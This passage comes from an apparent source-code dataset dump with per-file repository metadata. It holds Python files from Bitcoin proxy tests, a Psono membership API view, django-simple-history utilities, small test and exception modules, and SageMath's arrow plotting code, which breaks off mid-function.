import socket import traceback, sys from binascii import hexlify import time, os from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType from test_framework import BitcoinTestFramework from util import * class ProxyTest(BitcoinTestFramework): def __init__(self): self.conf1 = Socks5Configuration() self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000)) self.conf1.unauth = True self.conf1.auth = False self.conf2 = Socks5Configuration() self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000)) self.conf2.unauth = True self.conf2.auth = True self.conf3 = Socks5Configuration() self.conf3.af = socket.AF_INET6 self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000)) self.conf3.unauth = True self.conf3.auth = True self.serv1 = Socks5Server(self.conf1) self.serv1.start() self.serv2 = Socks5Server(self.conf2) self.serv2.start() self.serv3 = Socks5Server(self.conf3) self.serv3.start() def setup_nodes(self): return start_nodes(4, self.options.tmpdir, extra_args=[ ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'], ['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0'] ]) def node_test(self, node, proxies, auth): rv = [] node.addnode("15.61.23.23:1234", "onetry") cmd = proxies[0].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "15.61.23.23") assert_equal(cmd.port, 1234) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing IPv6 connection through node node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry") cmd = proxies[1].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534") assert_equal(cmd.port, 5443) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) node.addnode("newsvnvj7kcklujarx.onion:50020", "onetry") cmd = proxies[2].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "newsvnvj7kcklujarx.onion") assert_equal(cmd.port, 50020) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) node.addnode("node.noumenon:8333", "onetry") cmd = proxies[3].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, "node.noumenon") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) return rv def run_test(self): self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False) self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False) rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True) credentials = set((x.username,x.password) for x in rv) assert_equal(len(credentials), 4) self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False) if __name__ == '__main__': ProxyTest().main()
true
true
f729091a3f57c75215b2d30ff6f1aa0a14f519d6
4,080
py
Python
psono/restapi/views/membership.py
dirigeant/psono-server
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
[ "Apache-2.0", "CC0-1.0" ]
48
2018-04-19T15:50:58.000Z
2022-01-23T15:58:11.000Z
psono/restapi/views/membership.py
dirigeant/psono-server
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
[ "Apache-2.0", "CC0-1.0" ]
9
2018-09-13T14:56:18.000Z
2020-01-17T16:44:33.000Z
psono/restapi/views/membership.py
dirigeant/psono-server
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
[ "Apache-2.0", "CC0-1.0" ]
11
2019-09-20T11:53:47.000Z
2021-07-18T22:41:31.000Z
from rest_framework import status from rest_framework.response import Response from rest_framework.generics import GenericAPIView from ..permissions import IsAuthenticated from django.core.cache import cache from django.conf import settings from ..app_settings import ( CreateMembershipSerializer, UpdateMembershipSerializer, DeleteMembershipSerializer, ) from ..models import ( User_Group_Membership ) from ..authentication import TokenAuthentication class MembershipView(GenericAPIView): """ Manages group memberships """ authentication_classes = (TokenAuthentication, ) permission_classes = (IsAuthenticated,) allowed_methods = ('PUT', 'POST', 'DELETE', 'OPTIONS', 'HEAD') def get(self, request, *args, **kwargs): return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED) def put(self, request, *args, **kwargs): """ Creates a new group membership :param request: :type request: :param args: :type args: :param kwargs: :type kwargs: :return: 201 / 400 :rtype: """ serializer = CreateMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = User_Group_Membership.objects.create( user_id = serializer.validated_data['user_id'], group_id = serializer.validated_data['group_id'], creator = request.user, secret_key = str(serializer.validated_data['secret_key']), secret_key_nonce = str(serializer.validated_data['secret_key_nonce']), secret_key_type = str(serializer.validated_data['secret_key_type']), private_key = str(serializer.validated_data['private_key']), private_key_nonce = str(serializer.validated_data['private_key_nonce']), private_key_type = str(serializer.validated_data['private_key_type']), group_admin = serializer.validated_data['group_admin'], share_admin = serializer.validated_data['share_admin'], ) if settings.CACHE_ENABLE: cache_key = 'psono_user_status_' + str(serializer.validated_data['user_id']) cache.delete(cache_key) return Response({'membership_id': membership.id}, status=status.HTTP_201_CREATED) def post(self, request, *args, **kwargs): """ Updates a group membership :param request: :type request: :param args: :type args: :param kwargs: :type kwargs: :return: 200 / 400 :rtype: """ serializer = UpdateMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = serializer.validated_data['membership'] membership.group_admin = serializer.validated_data['group_admin'] membership.share_admin = serializer.validated_data['share_admin'] membership.save() return Response(status=status.HTTP_200_OK) def delete(self, request, *args, **kwargs): """ Deletes a group membership :param request: :param args: :param kwargs: :return: 200 / 400 """ serializer = DeleteMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = serializer.validated_data.get('membership') if settings.CACHE_ENABLE: cache_key = 'psono_user_status_' + str(membership.user.id) cache.delete(cache_key) # delete it membership.delete() return Response(status=status.HTTP_200_OK)
30.909091
105
0.647059
from rest_framework import status from rest_framework.response import Response from rest_framework.generics import GenericAPIView from ..permissions import IsAuthenticated from django.core.cache import cache from django.conf import settings from ..app_settings import ( CreateMembershipSerializer, UpdateMembershipSerializer, DeleteMembershipSerializer, ) from ..models import ( User_Group_Membership ) from ..authentication import TokenAuthentication class MembershipView(GenericAPIView): authentication_classes = (TokenAuthentication, ) permission_classes = (IsAuthenticated,) allowed_methods = ('PUT', 'POST', 'DELETE', 'OPTIONS', 'HEAD') def get(self, request, *args, **kwargs): return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED) def put(self, request, *args, **kwargs): serializer = CreateMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = User_Group_Membership.objects.create( user_id = serializer.validated_data['user_id'], group_id = serializer.validated_data['group_id'], creator = request.user, secret_key = str(serializer.validated_data['secret_key']), secret_key_nonce = str(serializer.validated_data['secret_key_nonce']), secret_key_type = str(serializer.validated_data['secret_key_type']), private_key = str(serializer.validated_data['private_key']), private_key_nonce = str(serializer.validated_data['private_key_nonce']), private_key_type = str(serializer.validated_data['private_key_type']), group_admin = serializer.validated_data['group_admin'], share_admin = serializer.validated_data['share_admin'], ) if settings.CACHE_ENABLE: cache_key = 'psono_user_status_' + str(serializer.validated_data['user_id']) cache.delete(cache_key) return Response({'membership_id': membership.id}, status=status.HTTP_201_CREATED) def post(self, request, *args, **kwargs): serializer = UpdateMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = serializer.validated_data['membership'] membership.group_admin = serializer.validated_data['group_admin'] membership.share_admin = serializer.validated_data['share_admin'] membership.save() return Response(status=status.HTTP_200_OK) def delete(self, request, *args, **kwargs): serializer = DeleteMembershipSerializer(data=request.data, context=self.get_serializer_context()) if not serializer.is_valid(): return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) membership = serializer.validated_data.get('membership') if settings.CACHE_ENABLE: cache_key = 'psono_user_status_' + str(membership.user.id) cache.delete(cache_key) membership.delete() return Response(status=status.HTTP_200_OK)
true
true
f7290948c42d8e7aa37006897fa91645c005e290
339
py
Python
ironsms/exceptions/limits.py
viuipan/ironsmslib
0d494ea08a6bcdd0f11f32e88baccd3555b5a0b3
[ "MIT" ]
null
null
null
ironsms/exceptions/limits.py
viuipan/ironsmslib
0d494ea08a6bcdd0f11f32e88baccd3555b5a0b3
[ "MIT" ]
null
null
null
ironsms/exceptions/limits.py
viuipan/ironsmslib
0d494ea08a6bcdd0f11f32e88baccd3555b5a0b3
[ "MIT" ]
null
null
null
from .base import APIException class LimitActiveException(APIException): message = "LIMIT_ACTIVE" description = "number activation has already been completed" limit: int def __init__(self, response): self.limit = response['limit'] super(LimitActiveException, self).__init__(description=self.description)
28.25
80
0.731563
from .base import APIException class LimitActiveException(APIException): message = "LIMIT_ACTIVE" description = "number activation has already been completed" limit: int def __init__(self, response): self.limit = response['limit'] super(LimitActiveException, self).__init__(description=self.description)
true
true
f72909bddee715522f021c82b50fd72ecc6d200a
1,803
py
Python
tests/outputs/test_standard_output.py
AustinScola/illud
a6aca1de38bbe9d5a795aaa084bcbd6731767d18
[ "MIT" ]
1
2020-12-05T00:59:15.000Z
2020-12-05T00:59:15.000Z
tests/outputs/test_standard_output.py
AustinScola/illud
a6aca1de38bbe9d5a795aaa084bcbd6731767d18
[ "MIT" ]
112
2021-01-15T21:42:27.000Z
2021-04-17T19:11:21.000Z
tests/outputs/test_standard_output.py
AustinScola/illud
a6aca1de38bbe9d5a795aaa084bcbd6731767d18
[ "MIT" ]
null
null
null
"""Test illud.outputs.standard_output.""" import sys from typing import Any from unittest.mock import MagicMock, patch import pytest from illud.output import Output from illud.outputs.standard_output import StandardOutput def test_inheritance() -> None: """Test illud.outputs.standard_output.StandardOutput inheritance.""" assert issubclass(StandardOutput, Output) def test_init() -> None: """Test illud.outputs.standard_output.StandardOutput.__init__.""" standard_output: StandardOutput = StandardOutput() assert standard_output._stdout == sys.stdout # pylint: disable=protected-access # yapf: disable @pytest.mark.parametrize('standard_output, other, expected_equality', [ (StandardOutput(), 'foo', False), (StandardOutput(), StandardOutput(), True), ]) # yapf: enable def test_eq(standard_output: StandardOutput, other: Any, expected_equality: bool) -> None: """Test illud.outputs.standard_output.StandardOutput.__eq__.""" equality: bool = standard_output == other assert equality == expected_equality # yapf: disable @pytest.mark.parametrize('string', [ (''), ('foo'), ]) # yapf: enable def test_write(string: str) -> None: """Test illud.outputs.standard_output.StandardOutput.write.""" stdout_mock = MagicMock(sys.stdout) with patch('sys.stdout', stdout_mock): standard_output: StandardOutput = StandardOutput() standard_output.write(string) stdout_mock.write.assert_called_once_with(string) def test_flush() -> None: """Test illud.outputs.standard_output.StandardOutput.flush.""" stdout_mock = MagicMock(sys.stdout) with patch('sys.stdout', stdout_mock): standard_output: StandardOutput = StandardOutput() standard_output.flush() stdout_mock.flush.assert_called_once_with()
28.619048
90
0.733222
import sys from typing import Any from unittest.mock import MagicMock, patch import pytest from illud.output import Output from illud.outputs.standard_output import StandardOutput def test_inheritance() -> None: assert issubclass(StandardOutput, Output) def test_init() -> None: standard_output: StandardOutput = StandardOutput() assert standard_output._stdout == sys.stdout @pytest.mark.parametrize('standard_output, other, expected_equality', [ (StandardOutput(), 'foo', False), (StandardOutput(), StandardOutput(), True), ]) def test_eq(standard_output: StandardOutput, other: Any, expected_equality: bool) -> None: equality: bool = standard_output == other assert equality == expected_equality @pytest.mark.parametrize('string', [ (''), ('foo'), ]) def test_write(string: str) -> None: stdout_mock = MagicMock(sys.stdout) with patch('sys.stdout', stdout_mock): standard_output: StandardOutput = StandardOutput() standard_output.write(string) stdout_mock.write.assert_called_once_with(string) def test_flush() -> None: stdout_mock = MagicMock(sys.stdout) with patch('sys.stdout', stdout_mock): standard_output: StandardOutput = StandardOutput() standard_output.flush() stdout_mock.flush.assert_called_once_with()
true
true
f72909d51f6781094ad2796f88e7cadc34ab5a20
438
py
Python
Entrenamiento Algoritmico/listas.py
andersonvelasco/Programming-2020B
bd843a406353b55ca83b9684c394aec1556aaddc
[ "Apache-2.0" ]
null
null
null
Entrenamiento Algoritmico/listas.py
andersonvelasco/Programming-2020B
bd843a406353b55ca83b9684c394aec1556aaddc
[ "Apache-2.0" ]
null
null
null
Entrenamiento Algoritmico/listas.py
andersonvelasco/Programming-2020B
bd843a406353b55ca83b9684c394aec1556aaddc
[ "Apache-2.0" ]
null
null
null
#Packages import os os.system("cls") lista=[] #Functions def llenar_lista(x): lista.append(x) #def validacion_lista(): # print("Validación :") #def mostrar_lista(): # print("Mostrar") #Main num=int(input("Ingrese No: ")) op=int(input("::::Desea Agregar un nuevo Número a la Lista : \n1. Si\n2. No : ")) if op =="s" or op =="S" or op == "1": llenar_lista(num) else: print("opción incorrecta") # validacion_lista()
19.043478
81
0.63242
import os os.system("cls") lista=[] def llenar_lista(x): lista.append(x) num=int(input("Ingrese No: ")) op=int(input("::::Desea Agregar un nuevo Número a la Lista : \n1. Si\n2. No : ")) if op =="s" or op =="S" or op == "1": llenar_lista(num) else: print("opción incorrecta")
true
true
f7290b4c53116bdaf469ce7678a80eb24c95ee72
6,490
py
Python
simple_history/utils.py
felixschloesser/django-simple-history
28abacb8a776fbaffcf0a42432a6a88be3561a86
[ "BSD-3-Clause" ]
2
2021-03-26T09:20:05.000Z
2021-05-26T13:46:48.000Z
simple_history/utils.py
felixschloesser/django-simple-history
28abacb8a776fbaffcf0a42432a6a88be3561a86
[ "BSD-3-Clause" ]
55
2020-12-25T06:47:15.000Z
2022-03-28T20:06:13.000Z
simple_history/utils.py
hramezani/django-simple-history
32645206749a1cc68539d9ad6499f1a938b2c9f4
[ "BSD-3-Clause" ]
null
null
null
import warnings import django from django.db import transaction from django.db.models import ManyToManyField from django.forms.models import model_to_dict from simple_history.exceptions import AlternativeManagerError, NotHistoricalModelError def update_change_reason(instance, reason): attrs = {} model = type(instance) manager = instance if instance.id is not None else model history = get_history_manager_for_model(manager) history_fields = [field.attname for field in history.model._meta.fields] for field in instance._meta.fields: if field.attname not in history_fields: continue value = getattr(instance, field.attname) if field.primary_key is True: if value is not None: attrs[field.attname] = value else: attrs[field.attname] = value record = history.filter(**attrs).order_by("-history_date").first() record.history_change_reason = reason record.save() def get_history_manager_for_model(model): """Return the history manager for a given app model.""" try: manager_name = model._meta.simple_history_manager_attribute except AttributeError: raise NotHistoricalModelError( "Cannot find a historical model for {model}.".format(model=model) ) return getattr(model, manager_name) def get_history_model_for_model(model): """Return the history model for a given app model.""" return get_history_manager_for_model(model).model def bulk_create_with_history( objs, model, batch_size=None, ignore_conflicts=False, default_user=None, default_change_reason=None, default_date=None, ): """ Bulk create the objects specified by objs while also bulk creating their history (all in one transaction). Because of not providing primary key attribute after bulk_create on any DB except Postgres (https://docs.djangoproject.com/en/2.2/ref/models/querysets/#bulk-create) Divide this process on two transactions for other DB's :param objs: List of objs (not yet saved to the db) of type model :param model: Model class that should be created :param batch_size: Number of objects that should be created in each batch :param default_user: Optional user to specify as the history_user in each historical record :param default_change_reason: Optional change reason to specify as the change_reason in each historical record :param default_date: Optional date to specify as the history_date in each historical record :return: List of objs with IDs """ # Exclude ManyToManyFields because they end up as invalid kwargs to # model.objects.filter(...) below. exclude_fields = [ field.name for field in model._meta.get_fields() if isinstance(field, ManyToManyField) ] history_manager = get_history_manager_for_model(model) model_manager = model._default_manager second_transaction_required = True with transaction.atomic(savepoint=False): objs_with_id = model_manager.bulk_create( objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts ) if objs_with_id and objs_with_id[0].pk and not ignore_conflicts: second_transaction_required = False history_manager.bulk_history_create( objs_with_id, batch_size=batch_size, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) if second_transaction_required: obj_list = [] with transaction.atomic(savepoint=False): for obj in objs_with_id: attributes = dict( filter( lambda x: x[1] is not None, model_to_dict(obj, exclude=exclude_fields).items(), ) ) obj_list += model_manager.filter(**attributes) history_manager.bulk_history_create( obj_list, batch_size=batch_size, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) objs_with_id = obj_list return objs_with_id def bulk_update_with_history( objs, model, fields, batch_size=None, default_user=None, default_change_reason=None, default_date=None, manager=None, ): """ Bulk update the objects specified by objs while also bulk creating their history (all in one transaction). :param objs: List of objs of type model to be updated :param model: Model class that should be updated :param fields: The fields that are updated :param batch_size: Number of objects that should be updated in each batch :param default_user: Optional user to specify as the history_user in each historical record :param default_change_reason: Optional change reason to specify as the change_reason in each historical record :param default_date: Optional date to specify as the history_date in each historical record :param manager: Optional model manager to use for the model instead of the default manager """ history_manager = get_history_manager_for_model(model) model_manager = manager or model._default_manager if model_manager.model is not model: raise AlternativeManagerError("The given manager does not belong to the model.") with transaction.atomic(savepoint=False): model_manager.bulk_update(objs, fields, batch_size=batch_size) history_manager.bulk_history_create( objs, batch_size=batch_size, update=True, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) def get_change_reason_from_object(obj): if hasattr(obj, "_change_reason"): return getattr(obj, "_change_reason") if hasattr(obj, "changeReason"): warning_msg = ( "Using the attr changeReason to populate history_change_reason is" " deprecated in 2.10.0 and will be removed in 3.0.0. Use " "_change_reason instead. " ) warnings.warn(warning_msg, DeprecationWarning) return getattr(obj, "changeReason") return None
36.666667
88
0.679045
import warnings import django from django.db import transaction from django.db.models import ManyToManyField from django.forms.models import model_to_dict from simple_history.exceptions import AlternativeManagerError, NotHistoricalModelError def update_change_reason(instance, reason): attrs = {} model = type(instance) manager = instance if instance.id is not None else model history = get_history_manager_for_model(manager) history_fields = [field.attname for field in history.model._meta.fields] for field in instance._meta.fields: if field.attname not in history_fields: continue value = getattr(instance, field.attname) if field.primary_key is True: if value is not None: attrs[field.attname] = value else: attrs[field.attname] = value record = history.filter(**attrs).order_by("-history_date").first() record.history_change_reason = reason record.save() def get_history_manager_for_model(model): try: manager_name = model._meta.simple_history_manager_attribute except AttributeError: raise NotHistoricalModelError( "Cannot find a historical model for {model}.".format(model=model) ) return getattr(model, manager_name) def get_history_model_for_model(model): return get_history_manager_for_model(model).model def bulk_create_with_history( objs, model, batch_size=None, ignore_conflicts=False, default_user=None, default_change_reason=None, default_date=None, ): exclude_fields = [ field.name for field in model._meta.get_fields() if isinstance(field, ManyToManyField) ] history_manager = get_history_manager_for_model(model) model_manager = model._default_manager second_transaction_required = True with transaction.atomic(savepoint=False): objs_with_id = model_manager.bulk_create( objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts ) if objs_with_id and objs_with_id[0].pk and not ignore_conflicts: second_transaction_required = False history_manager.bulk_history_create( objs_with_id, batch_size=batch_size, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) if second_transaction_required: obj_list = [] with transaction.atomic(savepoint=False): for obj in objs_with_id: attributes = dict( filter( lambda x: x[1] is not None, model_to_dict(obj, exclude=exclude_fields).items(), ) ) obj_list += model_manager.filter(**attributes) history_manager.bulk_history_create( obj_list, batch_size=batch_size, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) objs_with_id = obj_list return objs_with_id def bulk_update_with_history( objs, model, fields, batch_size=None, default_user=None, default_change_reason=None, default_date=None, manager=None, ): history_manager = get_history_manager_for_model(model) model_manager = manager or model._default_manager if model_manager.model is not model: raise AlternativeManagerError("The given manager does not belong to the model.") with transaction.atomic(savepoint=False): model_manager.bulk_update(objs, fields, batch_size=batch_size) history_manager.bulk_history_create( objs, batch_size=batch_size, update=True, default_user=default_user, default_change_reason=default_change_reason, default_date=default_date, ) def get_change_reason_from_object(obj): if hasattr(obj, "_change_reason"): return getattr(obj, "_change_reason") if hasattr(obj, "changeReason"): warning_msg = ( "Using the attr changeReason to populate history_change_reason is" " deprecated in 2.10.0 and will be removed in 3.0.0. Use " "_change_reason instead. " ) warnings.warn(warning_msg, DeprecationWarning) return getattr(obj, "changeReason") return None
true
true
f7290c2a98dd473c3692b518839a458e52199318
24,669
py
Python
src/sage/plot/arrow.py
rekhabiswal/sage
e8633b09919542a65e7e990c8369fee30c7edefd
[ "BSL-1.0" ]
null
null
null
src/sage/plot/arrow.py
rekhabiswal/sage
e8633b09919542a65e7e990c8369fee30c7edefd
[ "BSL-1.0" ]
null
null
null
src/sage/plot/arrow.py
rekhabiswal/sage
e8633b09919542a65e7e990c8369fee30c7edefd
[ "BSL-1.0" ]
null
null
null
""" Arrows """ #***************************************************************************** # Copyright (C) 2006 Alex Clemesha <clemesha@gmail.com>, # William Stein <wstein@gmail.com>, # 2008 Mike Hansen <mhansen@gmail.com>, # 2009 Emily Kirkman # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** from sage.plot.primitive import GraphicPrimitive from sage.misc.decorators import options, rename_keyword from sage.plot.colors import to_mpl_color class CurveArrow(GraphicPrimitive): def __init__(self, path, options): """ Returns an arrow graphics primitive along the provided path (bezier curve). EXAMPLES:: sage: from sage.plot.arrow import CurveArrow sage: b = CurveArrow(path=[[(0,0),(.5,.5),(1,0)],[(.5,1),(0,0)]], ....: options={}) sage: b CurveArrow from (0, 0) to (0, 0) """ import numpy as np self.path = path codes = [1] + (len(self.path[0])-1)*[len(self.path[0])] vertices = self.path[0] for curve in self.path[1:]: vertices += curve codes += (len(curve))*[len(curve)+1] self.codes = codes self.vertices = np.array(vertices, np.float) GraphicPrimitive.__init__(self, options) def get_minmax_data(self): """ Returns a dictionary with the bounding box data. EXAMPLES:: sage: from sage.plot.arrow import CurveArrow sage: b = CurveArrow(path=[[(0,0),(.5,.5),(1,0)],[(.5,1),(0,0)]], ....: options={}) sage: d = b.get_minmax_data() sage: d['xmin'] 0.0 sage: d['xmax'] 1.0 """ return {'xmin': self.vertices[:,0].min(), 'xmax': self.vertices[:,0].max(), 'ymin': self.vertices[:,1].min(), 'ymax': self.vertices[:,1].max()} def _allowed_options(self): """ Return the dictionary of allowed options for the curve arrow graphics primitive. EXAMPLES:: sage: from sage.plot.arrow import CurveArrow sage: list(sorted(CurveArrow(path=[[(0,0),(2,3)]],options={})._allowed_options().items())) [('arrowsize', 'The size of the arrowhead'), ('arrowstyle', 'todo'), ('head', '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)'), ('hue', 'The color given as a hue.'), ('legend_color', 'The color of the legend text.'), ('legend_label', 'The label for this item in the legend.'), ('linestyle', "2d only: The style of the line, which is one of 'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', respectively."), ('rgbcolor', 'The color as an RGB tuple.'), ('thickness', 'The thickness of the arrow.'), ('width', 'The width of the shaft of the arrow, in points.'), ('zorder', '2-d only: The layer level in which to draw')] """ return {'width': 'The width of the shaft of the arrow, in points.', 'rgbcolor': 'The color as an RGB tuple.', 'hue': 'The color given as a hue.', 'legend_label': 'The label for this item in the legend.', 'legend_color': 'The color of the legend text.', 'arrowstyle': 'todo', 'arrowsize': 'The size of the arrowhead', 'thickness': 'The thickness of the arrow.', 'zorder': '2-d only: The layer level in which to draw', 'head': '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)', 'linestyle': "2d only: The style of the line, which is one of " "'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', " "respectively."} def _repr_(self): """ Text representation of an arrow graphics primitive. EXAMPLES:: sage: from sage.plot.arrow import CurveArrow sage: CurveArrow(path=[[(0,0),(1,4),(2,3)]],options={})._repr_() 'CurveArrow from (0, 0) to (2, 3)' """ return "CurveArrow from %s to %s" % (self.path[0][0], self.path[-1][-1]) def _render_on_subplot(self, subplot): """ Render this arrow in a subplot. This is the key function that defines how this arrow graphics primitive is rendered in matplotlib's library. EXAMPLES:: This function implicitly ends up rendering this arrow on a matplotlib subplot: sage: arrow(path=[[(0,1), (2,-1), (4,5)]]) Graphics object consisting of 1 graphics primitive """ from sage.plot.misc import get_matplotlib_linestyle options = self.options() width = float(options['width']) head = options.pop('head') if head == 0: style = '<|-' elif head == 1: style = '-|>' elif head == 2: style = '<|-|>' else: raise KeyError('head parameter must be one of 0 (start), 1 (end) or 2 (both).') arrowsize = float(options.get('arrowsize', 5)) head_width = arrowsize head_length = arrowsize * 2.0 color = to_mpl_color(options['rgbcolor']) from matplotlib.patches import FancyArrowPatch from matplotlib.path import Path bpath = Path(self.vertices, self.codes) p = FancyArrowPatch(path=bpath, lw=width, arrowstyle='%s,head_width=%s,head_length=%s' % (style, head_width, head_length), fc=color, ec=color, linestyle=get_matplotlib_linestyle(options['linestyle'], return_type='long')) p.set_zorder(options['zorder']) p.set_label(options['legend_label']) subplot.add_patch(p) return p class Arrow(GraphicPrimitive): """ Primitive class that initializes the (line) arrow graphics type EXAMPLES: We create an arrow graphics object, then take the 0th entry in it to get the actual Arrow graphics primitive:: sage: P = arrow((0,1), (2,3))[0] sage: type(P) <class 'sage.plot.arrow.Arrow'> sage: P Arrow from (0.0,1.0) to (2.0,3.0) """ def __init__(self, xtail, ytail, xhead, yhead, options): """ Create an arrow graphics primitive. EXAMPLES:: sage: from sage.plot.arrow import Arrow sage: Arrow(0,0,2,3,{}) Arrow from (0.0,0.0) to (2.0,3.0) """ self.xtail = float(xtail) self.xhead = float(xhead) self.ytail = float(ytail) self.yhead = float(yhead) GraphicPrimitive.__init__(self, options) def get_minmax_data(self): """ Returns a bounding box for this arrow. EXAMPLES:: sage: d = arrow((1,1), (5,5)).get_minmax_data() sage: d['xmin'] 1.0 sage: d['xmax'] 5.0 """ return {'xmin': min(self.xtail, self.xhead), 'xmax': max(self.xtail, self.xhead), 'ymin': min(self.ytail, self.yhead), 'ymax': max(self.ytail, self.yhead)} def _allowed_options(self): """ Return the dictionary of allowed options for the line arrow graphics primitive. EXAMPLES:: sage: from sage.plot.arrow import Arrow sage: list(sorted(Arrow(0,0,2,3,{})._allowed_options().items())) [('arrowshorten', 'The length in points to shorten the arrow.'), ('arrowsize', 'The size of the arrowhead'), ('head', '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)'), ('hue', 'The color given as a hue.'), ('legend_color', 'The color of the legend text.'), ('legend_label', 'The label for this item in the legend.'), ('linestyle', "2d only: The style of the line, which is one of 'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', respectively."), ('rgbcolor', 'The color as an RGB tuple.'), ('thickness', 'The thickness of the arrow.'), ('width', 'The width of the shaft of the arrow, in points.'), ('zorder', '2-d only: The layer level in which to draw')] """ return {'width': 'The width of the shaft of the arrow, in points.', 'rgbcolor': 'The color as an RGB tuple.', 'hue': 'The color given as a hue.', 'arrowshorten': 'The length in points to shorten the arrow.', 'arrowsize': 'The size of the arrowhead', 'thickness': 'The thickness of the arrow.', 'legend_label': 'The label for this item in the legend.', 'legend_color': 'The color of the legend text.', 'zorder': '2-d only: The layer level in which to draw', 'head': '2-d only: Which end of the path to draw the head (one of 0 (start), 1 (end) or 2 (both)', 'linestyle': "2d only: The style of the line, which is one of " "'dashed', 'dotted', 'solid', 'dashdot', or '--', ':', '-', '-.', " "respectively."} def _plot3d_options(self, options=None): """ Translate 2D plot options into 3D plot options. EXAMPLES:: sage: P = arrow((0,1), (2,3), width=5) sage: p=P[0]; p Arrow from (0.0,1.0) to (2.0,3.0) sage: q=p.plot3d() sage: q.thickness 5 """ if options is None: options = self.options() options = dict(self.options()) options_3d = {} if 'width' in options: options_3d['thickness'] = options['width'] del options['width'] # ignore zorder and head in 3d plotting if 'zorder' in options: del options['zorder'] if 'head' in options: del options['head'] if 'linestyle' in options: del options['linestyle'] options_3d.update(GraphicPrimitive._plot3d_options(self, options)) return options_3d def plot3d(self, ztail=0, zhead=0, **kwds): """ Takes 2D plot and places it in 3D. EXAMPLES:: sage: A = arrow((0,0),(1,1))[0].plot3d() sage: A.jmol_repr(A.testing_render_params())[0] 'draw line_1 diameter 2 arrow {0.0 0.0 0.0} {1.0 1.0 0.0} ' Note that we had to index the arrow to get the Arrow graphics primitive. We can also change the height via the :meth:`Graphics.plot3d` method, but only as a whole:: sage: A = arrow((0,0),(1,1)).plot3d(3) sage: A.jmol_repr(A.testing_render_params())[0][0] 'draw line_1 diameter 2 arrow {0.0 0.0 3.0} {1.0 1.0 3.0} ' Optional arguments place both the head and tail outside the `xy`-plane, but at different heights. This must be done on the graphics primitive obtained by indexing:: sage: A=arrow((0,0),(1,1))[0].plot3d(3,4) sage: A.jmol_repr(A.testing_render_params())[0] 'draw line_1 diameter 2 arrow {0.0 0.0 3.0} {1.0 1.0 4.0} ' """ from sage.plot.plot3d.shapes2 import line3d options = self._plot3d_options() options.update(kwds) return line3d([(self.xtail, self.ytail, ztail), (self.xhead, self.yhead, zhead)], arrow_head=True, 